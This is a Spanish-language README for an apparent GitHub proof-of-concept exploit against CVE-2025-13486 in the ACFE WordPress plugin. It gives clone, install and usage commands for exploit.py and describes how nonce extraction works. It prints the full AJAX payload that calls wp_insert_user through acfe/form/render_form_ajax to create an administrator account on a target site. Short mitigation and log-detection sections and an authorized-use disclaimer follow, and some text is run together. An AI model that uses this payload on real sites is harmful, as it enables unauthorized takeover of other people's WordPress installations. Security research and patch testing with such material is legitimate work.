
Advanced Custom Fields Extended (ACFE) WordPress Plugin Exploit RCE - Creación de Administrador
Exploit de prueba de concepto para CVE-2025-13486, una vulnerabilidad crítica en el plugin de WordPress Advanced Custom Fields: Extended (ACFE) que permite la Ejecución Remota de Código que conduce a la Escalada de Privilegios.
| Aspecto | Detalles |
|---|---|
| ID CVE | CVE-2025-13486 |
| Plugin | Advanced Custom Fields: Extended (ACFE) |
| Tipo | Ejecución Remota de Código → Escalada de Privilegios |
| Nivel de Riesgo | Crítico |
| Versiones Afectadas | Versiones vulnerables de ACFE (versiones específicas pendientes) |
| Puntuación CVSS | 9.8 CRÍTICO |
| Fecha de Descubrimiento | 2025 |
| Autor | 0xgh057r3c0n |
⚠️ ADVERTENCIA: Esta herramienta es SOLO para pruebas de seguridad autorizadas y fines educativos.
✅ Uso Permitido:
❌ Uso Prohibido:
El autor no es responsable por el mal uso de esta herramienta. Siempre obtén la autorización por escrito adecuada antes de probar cualquier sistema.
print_rwp_insert_userrequests# Clone repository
git clone https://github.com/0xgh057r3c0n/CVE-2025-13486.git
cd CVE-2025-13486
# Install dependencies
pip install requests
# Alternative: Install from requirements.txt
pip install -r requirements.txt
# Make script executable (Linux/Mac)
chmod +x exploit.py
Create a requirements.txt file:
requests>=2.25.1
python3 exploit.py --url <TARGET_URL> [OPTIONS]
python3 exploit.py --url http://target.com --verify
python3 exploit.py --url https://target.com
python3 exploit.py --url https://target.com \
--user backup_admin \
--password "P@ssw0rd123!" \
--email [email protected]
python3 exploit.py --url target.com --verify
| Opción | Descripción | Requerido | Por Defecto |
|---|---|---|---|
-u, --url | URL de WordPress objetivo | Sí | - |
--verify | Solo verificar, sin explotación | No | Falso |
--user | Nombre de usuario personalizado para admin | No | admin_XXXXX |
--password | Contraseña personalizada para admin | No | 12 caracteres aleatorios |
--email | Correo electrónico personalizado para admin | No | [email protected] |
El exploit aprovecha el manejo inadecuado de funciones en el endpoint acfe/form/render_form_ajax del plugin ACFE, permitiendo a los atacantes llamar funciones PHP arbitrarias.
1. URL Validation → Auto-detects HTTP/HTTPS
2. Nonce Extraction → Scans page for ACF nonce
3. Payload Construction → Builds malicious AJAX request
4. Request Execution → Sends exploit to target
5. Result Analysis → Checks for success indicators
// Vulnerable code pattern in ACFE
$result = call_user_func_array($form['render'], array($form));
// Exploit payload structure
{
"action": "acfe/form/render_form_ajax",
"nonce": "extracted_nonce",
"form[render]": "wp_insert_user",
"form[user_login]": "attacker_user",
"form[user_pass]": "attacker_pass",
"form[user_email]": "[email protected]",
"form[role]": "administrator"
}
# Recommended security plugins
1. Wordfence Security
2. Sucuri Security
3. iThemes Security
4. All In One WP Security
# Server-level protections
- Implement rate limiting
- Enable mod_security rules
- Use Cloudflare or similar CDN
- Regular security audits
/wp-admin/admin-ajax.phpaction=acfe/form/render_form_ajaxwp_insert_user vía AJAX# Apache logs
grep "admin-ajax.php" /var/log/apache2/access.log | grep "acfe/form"
# WordPress debug logs
define('WP_DEBUG', true);
define('WP_DEBUG_LOG', true);
git checkout -b feature/improvement)git commit -am 'Añadir nueva funcionalidad')git push origin feature/improvement)Por favor, reporta errores y problemas mediante: